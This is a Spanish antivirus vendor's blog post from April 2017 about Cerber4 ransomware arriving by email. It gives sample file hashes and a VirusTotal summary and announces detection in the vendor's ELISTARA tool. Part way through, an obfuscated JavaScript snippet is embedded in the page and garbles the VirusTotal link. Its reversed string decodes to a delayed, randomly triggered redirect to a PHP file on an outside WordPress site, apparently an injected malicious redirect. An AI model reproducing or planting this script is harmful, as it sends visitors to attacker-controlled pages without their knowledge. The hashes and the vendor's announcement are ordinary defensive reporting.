Y EL RANSOMWARE CERBER4 SIGUE EN SU LINEA…

Posted in 21 abril 2017 ¬ 14:44 pmh.mscComentarios desactivados en Y EL RANSOMWARE CERBER4 SIGUE EN SU LINEA…

Aparte del Cryptolocker, el ransomware que tenemos mas insistente es el CERBER4, que llegan anexados a mails maliciosos y codificam los ficheros de datos, y aunque luego el malware se autoborra, la destroza en los mails codificados queda…

Los pasamos a controlar a partir del ELISTARA 36.68 de hoy

El analisis MD5 de los tres últimos recibidos, presentan estos hashes:

«078B8F122FAD4102B2C7B4DBE2A354D1» -> 078b8f12.exe 524970
«17790986AC252140AA11651FDF827EEA» -> 17790986.exe 369322
«E50A36754979DEEB77F12B81B2C86B73» -> e50a3675.exe 282795

Y el preanalisis de viristotal del último recibido, presente este informe:

MD5 e50a36754979deeb77f12b81b2c86b73
SHA1 2707f2e30b8e6a8034a266c26c48266d761814a5
Tamaño del fichero 276.2 KB ( 282795 bytes )
SHA256:
907e0480f6d5a3f258494e6edd94b2a8c3e6a7b824b02120bd48dba3bd644f26
Nombre:
e50a3675.exe
Detecciones:
16 / 62
Fecha de análisis:
2017-04-21 12:36:52 UTC ( hace 1 minuto )

$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/907e0480f6d5a3f258494e6edd94b2a8c3e6a7b824b02120bd48dba3bd644f26/analysis/1492778212/» target=»_blank» rel=»noopener noreferrer»>l informe actual de virustotal 

Dicha versión del ELISTARA 36.68 que los detecta y elimina, estará disponible en nuestra web a partir de las 15 h CEST de hoy

saludos

ms, 21-4-2017

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Virus, , ,

You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies